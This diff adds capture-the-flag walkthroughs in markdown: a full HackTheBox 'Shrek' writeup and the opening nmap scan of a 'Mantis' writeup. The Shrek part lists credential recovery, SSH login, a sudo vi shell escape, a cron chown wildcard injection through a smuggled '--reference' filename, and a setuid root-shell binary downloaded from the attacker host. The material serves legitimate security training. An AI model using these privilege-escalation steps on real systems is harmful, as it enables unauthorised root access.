+ -rw-r--r-- 1 0 0 4096 Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
+ -rw-r--r-- 1 0 0 7598 Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
+ -rw-r--r-- 1 0 0 12288 Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
+ -rw-r--r-- 1 0 0 9216 Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
+ -rw-r--r-- 1 0 0 1766 Aug 16 2017 key
+
+
+We retrieve key which is an encrypted private ssh key:
+
+
+
+So instead of getting every file from the ftp service one by one, we'll just use wget:
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
+ → wget -r --user="donkey" --password="d0nk3y1337!" ftp://10.10.10.47/
+ --2020-08-14 12:25:21-- ftp://10.10.10.47/
+ => ‘10.10.10.47/.listing’
+ Connecting to 10.10.10.47:21... connected.
+ Logging in as donkey ... Logged in!
+ ==> SYST ... done. ==> PWD ... done.
+ ==> TYPE I ... done. ==> CWD not needed.
+ ==> PASV ... done. ==> LIST ... done.
+
+ [...]
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
+ → ls -lashR
+ .:
+ total 3.4M
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 .
+ 4.0K drwxr-xr-x 5 nothing nothing 4.0K Aug 14 11:58 ..
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 10.10.10.47
+ 4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 14 12:20 key
+ 3.4M -rw-r--r-- 1 nothing nothing 3.3M Aug 15 2017 'Smash Mouth - All Star.mp3'
+
+ ./10.10.10.47:
+ total 332K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 .
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 ..
+ 12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
+ 12K -rw-r--r-- 1 nothing nothing 11K Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
+ 16K -rw-r--r-- 1 nothing nothing 14K Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
+ 16K -rw-r--r-- 1 nothing nothing 16K Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
+ 16K -rw-r--r-- 1 nothing nothing 13K Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.5K Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
+ 12K -rw-r--r-- 1 nothing nothing 12K Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
+ 12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 16 2017 key
+
+
+
+The idea here is to check the wordcount with the wc command:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek/10.10.10.47]
+ → wc *.txt
+ 0 1 9216 0a935efe212d455eaba901f743e76a1f.txt
+ 0 1 7168 129a5d725798449cbe35c14226c21ec8.txt
+ 0 1 11264 173224a539f74d5bbd78bd097884a445.txt
+ 0 1 15360 1cf72311c8394b85bee71378452a0627.txt
+ 0 1 3072 2d0b3a4e22dc4043976529e9e450839d.txt
+ 0 1 3072 2fdfec98b6f54a4bb2c24492804ed23e.txt
+ 0 1 15360 3416a6f48fb7407e8bfa58ee7869b4c9.txt
+ 0 1 15360 35ed54b85fda4c728e28d043ceff403f.txt
+ 0 1 7168 3896633fd0f44d5789df5366050ecc4f.txt
+ 0 1 14336 40c2e657bcc54c78be1986e9bb45886a.txt
+ **0 3 15390 4328526e95f2406d8af2428b92a3afa8.txt**
+ 0 1 3072 549fe668212042acbcc96af1758141a4.txt
+ 0 1 6144 629ac3a5efe24adaa7b5172f8bda44ca.txt
+ 0 1 8192 631385a5a1ce4e46a206f0f0fbdc0808.txt
+ 0 1 6144 68b211ee5513471e8b7de17661d18a9d.txt
+ 0 1 13312 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
+ 0 1 15360 79947ab62f1a4b959b68ada2b7849ff2.txt
+ 0 1 5120 7ef381dce26a488493df64b67f3db3cf.txt
+ 0 1 5120 84644e19171e425d8ac6e6e7a1398c46.txt
+ 0 1 15360 9c11f948f169414cb4d3cfb607850e58.txt
+ 0 1 6144 9de89e29bdb64a5eb69f1a8f344cd85a.txt
+ 0 1 5120 a1127bfd922e43f0b0007b147c26e11e.txt
+ 0 1 7168 a381c21f0e874439a1a634a940eaf4a9.txt
+ 0 1 7168 b26e893ae4b84ca28872fc519c3803fc.txt
+ 0 1 8192 b2edd39d22674696a56a7939af2ff917.txt
+ 0 1 4096 bf22aa78874249a4a855995884f1daeb.txt
+ **0 3 7598 d25fcf2994e14ebf990cf5b9f0b98691.txt**
+ 0 1 12288 dddedeb00dee439a86f7ac4c583ec700.txt
+ 0 1 9216 e415d037bfb74c5fa6d0521ff662de8d.txt
+ 0 1 15360 e5598789c60b45cf9f821e130af3b70e.txt
+ 0 1 6144 f274007acbbb431185bc1fb3a1a8c5c0.txt
+ 0 35 283084 total
+
+
+
+Here 2 files stand out since they have 3 words each:
+
+
+
+The 2nd word in the first file gives us a username:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
+ → echo 'UHJpbmNlQ2hhcm1pbmc=' | base64 -d
+ PrinceCharming
+
+
+The 2nd file gives us binary data:
+
+
+
+In order to recover the password we have to guess that this is using ECC cryptography, and that we needed to use python3's seccure library:
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
+ → sudo apt install python3-pip
+ [sudo] password for nothing:
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ The following additional packages will be installed:
+ python-pip-whl python3-wheel
+ The following NEW packages will be installed:
+ python-pip-whl python3-pip python3-wheel
+ 0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
+ Need to get 2,078 kB of archives.
+ After this operation, 3,329 kB of additional disk space will be used.
+ Do you want to continue? [Y/n] y
+ Get:1 http://archive-4.kali.org/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
+ Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-wheel all 0.34.2-1 [24.0 kB]
+ Get:3 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
+ Fetched 2,078 kB in 1s (1,746 kB/s)
+ Selecting previously unselected package python-pip-whl.
+ (Reading database ... 311886 files and directories currently installed.)
+ Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
+ Unpacking python-pip-whl (20.0.2-5kali1) ...
+ Selecting previously unselected package python3-wheel.
+ Preparing to unpack .../python3-wheel_0.34.2-1_all.deb ...
+ Unpacking python3-wheel (0.34.2-1) ...
+ Selecting previously unselected package python3-pip.
+ Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
+ Unpacking python3-pip (20.0.2-5kali1) ...
+ Setting up python3-wheel (0.34.2-1) ...
+ Setting up python-pip-whl (20.0.2-5kali1) ...
+ Setting up python3-pip (20.0.2-5kali1) ...
+ Processing triggers for man-db (2.9.3-2) ...
+ Processing triggers for kali-menu (2020.3.2) ...
+ Scanning processes...
+ Scanning processor microcode...
+ Scanning linux images...
+
+ Running kernel seems to be up-to-date.
+
+ The processor microcode seems to be up-to-date.
+
+ No services need to be restarted.
+
+ No containers need to be restarted.
+
+ No user sessions are running outdated binaries.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
+ → pip3 install seccure
+ Collecting seccure
+ Downloading seccure-0.5.0.tar.gz (40 kB)
+ |████████████████████████████████| 40 kB 1.0 MB/s
+ Collecting gmpy2>=2
+ Downloading gmpy2-2.0.8.zip (280 kB)
+ |████████████████████████████████| 280 kB 2.0 MB/s
+ Collecting pycryptodome
+ Downloading pycryptodome-3.9.8-cp38-cp38-manylinux1_x86_64.whl (13.7 MB)
+ |████████████████████████████████| 13.7 MB 7.0 MB/s
+ Requirement already satisfied: six>=1.2 in /usr/lib/python3/dist-packages (from seccure) (1.15.0)
+ Building wheels for collected packages: seccure, gmpy2
+ Building wheel for seccure (setup.py) ... done
+ Created wheel for seccure: filename=seccure-0.5.0-py3-none-any.whl size=40750 sha256=99e3b0dbd16cb3c1eb87b2049ac5d24e70b803086078c97f634ba874f9b519b3
+
+
+Then we run it like so:
+
+
+ python3
+ Python 3.8.3rc1 (default, Aug 14 2020, 11:45:56)
+ [GCC 9.3.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> import seccure
+ >>> cipher = b'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec>> password = b'PrinceCharming'
+ >>> seccure.decrypt(cipher, password)
+ b'The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec\n'
+
+
+And there we have credentials! sec:shr3k1sb3st!
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
+ → cat key
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,94DC7309349E17F8ED6776ED69D6265A
+
+ rx7VJS6fzctpfTQ16y9M2CYG701eIh3nDQND+MSFAMSD8JiElqiIH7yA6TpXKPPx
+ A9gcxf1qlezc3XIhQpsLN9tLJpOxWYMniUo06/7k+2vWO6AzX27hVPRk1vk9OTWG
+ gRe856uaS8WfQ3XxehHNk1bu710HzBSwZn/XNbHsNo74Bpol8MTm2BTjvnuxnFY8
+ tvw53nbXMQffBmrwBTvc5aaCk/C0LfvemSxLAgAwMACNpbPmdw9NkUxRDbL/93Q1
+ ZYMlFxiXhLgFWQFdW/u2WURmOcIuAHd1V8gWIvY10IpH7o4nXaCI4D8PUmnIDt2N
+ k6Q3Znnfe8BrzFlD1NdG5SfHNdNUn5N9DROk0cZsL+D9e9bQb5CoyL2ioL9fEeRv
+ 4J5w2ZnIHStAez+Za11WGcZsW3jk2eXGPZiD99k5GcazWQ60dv5dUR6J5fkxaibi
+ unqmN2tDaKReT7aT4Im6pLUscN8t2w8dprgsD/EbMsPr0X/TqOShXXhMUhk/9SAY
+ 2Rvudp97fqYHugIch4lZdDpYS//KRwzO+wQOQARX0tJ0DJ++lY6WNM/BD6+HUk+v
+ 2c3ziM7DL4i7zhA0qnc8796Nxs8D/QTUWjmcNQhcOM4rAYsmyRqyoVe3ciadKWmk
+ vfwBJYxCwE9I9qUfZS3TsEYdbLE4MjlFB+Zn+fYpyA950hVFDxvu+E8zIcSYA0bJ
+ GAra2vH/xgmEoptYqeav/sstisJOYPW1Ui3K5C9E0QMH2MRReZoHlToCSNwUOWRo
+ rY1z3UZMyV5qw3VsuOk+n81P2npyP0RYo6xjAQW/1uN01LPi6y79j/3k9L35N7pH
+ vJHACTHa1bgCGkYGYm75DRIPYqJKs8g3htPHTbyfAfybeMBFQFxz3SBSWp8T9yjF
+ +WKUWQ2EmUtgC9n04tLf1/SIldvtOvtwyv2LiIzgvtT6DCMoulprRlb+U0iY1kbQ
+ lrpUhFtcK1SvC4Z6ebAEoX/jVRWKdbKldr35ECwIiMVNUFhvXwg4JRdmgmeeDga5
+ 66TSTqupISE7q6MuBfesQItkoiairO36enBvYdifN4/kRFBNXo1ZUTzdKVw6/UVo
+ n9tG9Fnk/z/Ee0iuT3PS0xtu6cBaXzFggm1n73honBjJzIJdtDAJ2AFSMJg6F6TJ
+ d0BPB0SGfF8rU+s0RjBhr1nE+px9qYKsuPAKkfi/b/EVa5WEacNezUTTKW9v9DjM
+ ym/zSi9GMDEczlFO2wthN5MXh0XNzUyQxDAcek1uZyaQd66NXQ0AywQG114+XLx8
+ 29sJvTuy6PXJs4ZUCno4/7RQnG9mwHtcV2f3ETASTjtsxBVotzfnpB22jgRND1fi
+ Ovqy0xbhRUrBhl8MjuE4Ha/ttoKvbDxC6PlVPMfjp3y2sTIDRp7HpAJfKoVMdJ5Y
+ 9FoWkWhrGkshGMIxyF3YE6cyhy8OOvmoEcNjyusCi1VWJpRxWU9Ml+GUH5gsjdAV
+ yiPvEG4LnM4gGeHhn9CZcrFJSYKIS0s+410YQvpECx09LaLBtq5y0QNkIspuKSPB
+ UDidMCyboqlc47D6SgNk7WQqut9tFj6PXE3chFFBHGfZ3hF9HnbUWBEiqyvOlAnm
+ -----END RSA PRIVATE KEY-----
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
+ → chmod 600 key
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
+ → ssh -i key sec@10.10.10.47
+ The authenticity of host '10.10.10.47 (10.10.10.47)' can't be established.
+ ECDSA key fingerprint is SHA256:elYdm7BTN0q3wYoaIdUyw1kBlMFTls2dWHgybMAYav8.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.47' (ECDSA) to the list of known hosts.
+ Enter passphrase for key 'key': shr3kisb3st!
+ Last login: Thu Oct 1 07:41:33 2020
+ [sec@shrek ~]$ id
+ uid=1000(sec) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
+ [sec@shrek ~]$ cat user.txt
+ d353869dc904f1f38d24fa118b397b19
+
+
+
+and we have the user flag!
+
+## **Part 3 : Getting Root Access**
+
+To get root access onto the box, we need to first privesc from the user sec to farquad:
+
+
+ [sec@shrek ~]$ sudo -l
+ User sec may run the following commands on shrek:
+ (farquad) NOPASSWD: /usr/bin/vi
+
+
+Get into vi using the user farquad using sudo -u:
+
+
+ [sec@shrek ~]$ sudo -u farquad vi
+
+
+Then type in **:!bash** to drop into a shell as farquad:
+
+
+
+ [farquad@shrek sec]$ id
+ uid=1001(farquad) gid=100(users) groups=100(users),7(lp),10(wheel),91(video),92(audio),93(optical),95(storage)
+
+ [farquad@shrek sec]$ cd ~
+ [farquad@shrek ~]$ ls
+ mirror
+ [farquad@shrek ~]$ ./mirror
+ Mirror, Mirror on the wall who is the most handsome of all?
+ Of course you Lord Farquad
+
+
+There we get a funny binary that mimics the mirror from the shrek movie, one may think this is a binexp challenge but when decompiled we see that it's a rabbit hole, since it prints the message and does nothing else. The idea here was to check out cronjobs (which we can guess from running pspy), which hints us towards a cronjob that is running every 5 minutes.
+
+
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1178 | /usr/bin/CROND -n
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1176 | /usr/bin/CROND -n
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1179 | /usr/bin/python /root/chown
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1180 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1181 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
+
+
+Farquaad's shell is kind of a rabbithole in itself, so back into sec's shell, we try to find files that were modified after the timestamps we find inside sec's home directory:
+
+
+ [sec@shrek ~]$ ls -lash
+ total 28K
+ 4.0K drwx------ 3 sec users 4.0K Aug 15 2017 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Aug 11 2017 ..
+ 0 -rw------- 1 root root 0 Aug 22 2017 .bash_history
+ 4.0K -rw-r--r-- 1 sec users 21 Feb 14 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 sec users 57 Feb 14 2017 .bash_profile
+ 4.0K -rw-r--r-- 1 sec users 141 Feb 14 2017 .bashrc
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 16 2017 .ssh
+ 4.0K -r--r--r-- 1 root root 33 Aug 22 2017 user.txt
+
+ [sec@shrek ~]$ find / -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null
+ 16385 4 drwxr-xr-x 46 root root 4096 Aug 21 2017 /etc
+ 18518 4 -rw-r--r-- 1 root root 6 Aug 23 2017 /etc/hostname
+ 27466 4 drwxr-xr-x 5 root root 4096 Aug 23 2017 /etc/netctl
+ 18515 4 -rw-r--r-- 1 root root 389 Aug 23 2017 /etc/netctl/static
+ 35103 8 -rw-r--r-- 1 root root 4606 Aug 21 2017 /etc/vsftpd.conf
+ 131506 4 drwxr-xr-x 4 root root 4096 Aug 23 2017 /etc/systemd/system
+ 138139 4 -rw-r--r-- 1 root root 196 Aug 23 2017 /etc/systemd/system/netctl@static.service
+ 131581 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /etc/systemd/system/multi-user.target.wants
+ 138140 0 lrwxrwxrwx 1 root root 41 Aug 23 2017 /etc/systemd/system/multi-user.target.wants/netctl@static.service -> /etc/systemd/system/netctl@static.service
+ 33988 4 -rw------- 1 root root 929 Aug 21 2017 /etc/shadow
+ 33931 4 -rw-r--r-- 1 root root 968 Aug 21 2017 /etc/passwd
+ 131255 4 drwxr-x--- 3 root root 4096 Aug 22 2017 /root
+ 17 4 -r--r--r-- 1 root root 33 Aug 22 2017 /home/sec/user.txt
+ 18 0 -rw------- 1 root root 0 Aug 22 2017 /home/sec/.bash_history
+ 131595 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /var/lib/dhcpcd
+ 138091 4 drwxr-xr-x 2 root root 4096 Aug 21 2017 /var/spool/cron
+ 138145 4 -rw------- 1 root root 97 Aug 22 2017 /var/spool/cron/root
+ 138108 8196 -rw-r----- 1 root systemd-journal 8388608 Aug 23 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/user-1001.journal
+ 138101 16388 -rw-r----- 1 root systemd-journal 16777216 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@00055747c657656c-ad9ea2c5440b64ec.journal~
+ 138138 8192 -rw-r----- 1 root systemd-journal 8388608 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@0005574ac144c200-f23de797a5b2e762.journal~
+ 137786 16 -rw------- 1 root utmp 15744 Aug 22 2017 /var/log/btmp.1
+ 131087 8 -rw------- 1 root root 7948 Aug 23 2017 /var/log/vsftpd.log.1
+ 137811 264656 -rw-r--r-- 1 root root 271001726 Aug 23 2017 /var/log/httpd/access_log.1
+ 137906 12 -rw-r--r-- 1 root root 9833 Aug 23 2017 /var/log/httpd/error_log.1
+ 2100 4 drwxr-xr-x 2 sec root 4096 Aug 23 2017 /usr/src
+ 20283 4 -rw-r--r-- 1 root root 91 Aug 22 2017 /usr/src/thoughts.txt
+
+
+Here we are hinted towards /usr/src/thoughts.txt, and by running pspy earlier we know that there is a cronjob being run against the /usr/src directory, therefore we can exploit the wildcard in the cronjob running **chown nobody:nobody *** there.
+
+
+ [sec@shrek src]$ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:57 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+
+
+
+The idea here is that thoughts.txt is readable by sec, and yet is owned by root. We need to take advantage of chown's wildcard like so:
+
+
+ [sec@shrek src]$ touch -- -reference=thoughts.txt
+ [sec@shrek src]$ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:59 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
+ 0 -rw-r--r-- 1 sec users 0 Aug 14 10:59 '-reference=thoughts.txt'
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+
+
+
+Now we have created a file named "--reference=thoughts.txt" which will be passed as an arguement to chown when it is run. Once that's done, it's possible to create a binary and set it's SUID bit. After the task runs and showns the binary, it's possible to execute code as root, such as spawning a bash shell!
+
+
+ [terminal 1]
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → vim nihilist.c
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → cat nihilist.c
+ #include <****stdio.h>
+ #include <****stdlib.h>
+ #include <****unistd.h>
+
+ int main( int argc, char *argv[] )
+ {
+ setreuid(0,0);
+ execve("/usr/bin/bash", NULL, NULL);
+ }
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → gcc nihilist.c -o privesc
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → ls -lash
+ total 36K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Jul 7 13:06 .
+ 4.0K drwxr-xr-x 9 nothing nothing 4.0K Jul 7 12:36 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 153 Jul 7 13:06 nihilist.c
+ 4.0K -rw------- 1 nothing nothing 1.8K Jul 7 12:39 key
+ 20K -rwxr-xr-x 1 nothing nothing 17K Jul 7 13:06 privesc
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [terminal 2]
+
+Now that's done we wait for the cronjob to run and we can :
+
+
+ [sec@shrek ~]$ cd /usr/src/
+ [sec@shrek src]$ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Aug 23 2017 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+ [sec@shrek src]$ wget http://10.10.14.8:9090/privesc
+ --2021-07-07 11:00:19-- http://10.10.14.8:9090/privesc
+ Connecting to 10.10.14.8:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 16656 (16K) [application/octet-stream]
+ Saving to: ‘privesc’
+
+ privesc 100%[======================================================================================================================================================================================>] 16.27K 35.8KB/s in 0.5s
+
+ 2021-07-07 11:00:20 (35.8 KB/s) - ‘privesc’ saved [16656/16656]
+
+ [sec@shrek src]$ chmod 4755 privesc
+
+ [sec@shrek src]$ touch -- --reference=thoughts.txt
+
+ [sec@shrek src]$ ls -lash
+ total 32K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Jul 7 11:00 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
+ 20K -rwsr-xr-x 1 sec users 17K Jul 7 10:48 privesc
+ 0 -rw-r--r-- 1 sec users 0 Jul 7 11:00 '--reference=thoughts.txt'
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+
+
+ [sec@shrek src]$ date
+ Wed Jul 7 11:01:26 UTC 2021
+
+ [sec@shrek src]$ date
+ Wed Jul 7 11:20:55 UTC 2021
+ [sec@shrek src]$ ls -lash privesc
+ 20K -rwsr-sr-x 1 root root 17K Jul 7 11:06 privesc
+ [sec@shrek src]$ ./privesc
+
+ bash-4.4# id
+ uid=0(root) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
+ bash-4.4# cat /root/root.txt
+ 27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/5.md b/Hard/5.md
new file mode 100644
index 0000000..3bd5e24
--- /dev/null
+++ b/Hard/5.md
@@ -0,0 +1,330 @@
+# Mantis Writeup
+
+
+
+## Introduction :
+
+Mantis is a hard windows box released back in September 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we start with nmap to scan for open ports, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → nmap -sCV 10.10.10.52
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 17:06 BST
+ Nmap scan report for 10.10.10.52
+ Host is up (0.57s latency).
+ Not shown: 984 closed ports
+ PORT STATE SERVICE VERSION
+ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-25 14:10:56Z)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
+ 464/tcp open kpasswd5?
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 636/tcp open tcpwrapped
+ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 3269/tcp open tcpwrapped
+ 49152/tcp open msrpc Microsoft Windows RPC
+ 49153/tcp open msrpc Microsoft Windows RPC
+ 49154/tcp open msrpc Microsoft Windows RPC
+ 49155/tcp open msrpc Microsoft Windows RPC
+ 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 49158/tcp open msrpc Microsoft Windows RPC
+ Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -36m00s, deviation: 2h18m34s, median: -1h56m01s
+ | smb-os-discovery:
+ | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
+ | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
+ | Computer name: mantis
+ | NetBIOS computer name: MANTIS\x00
+ | Domain name: htb.local
+ | Forest name: htb.local
+ | FQDN: mantis.htb.local
+ |_ System time: 2020-08-25T10:11:51-04:00
+ | smb-security-mode:
+ | account_used: <****blank>
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: required
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2020-08-25T14:11:53
+ |_ start_date: 2020-08-25T14:10:13
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 191.16 seconds
+
+## **Part 2 : Getting User Access**
+
+This box is one example of a machine that has alot of ports opened, and yet these are not enough. you need to enumerate every port on this machine using nmap's -p- flag:
+
+
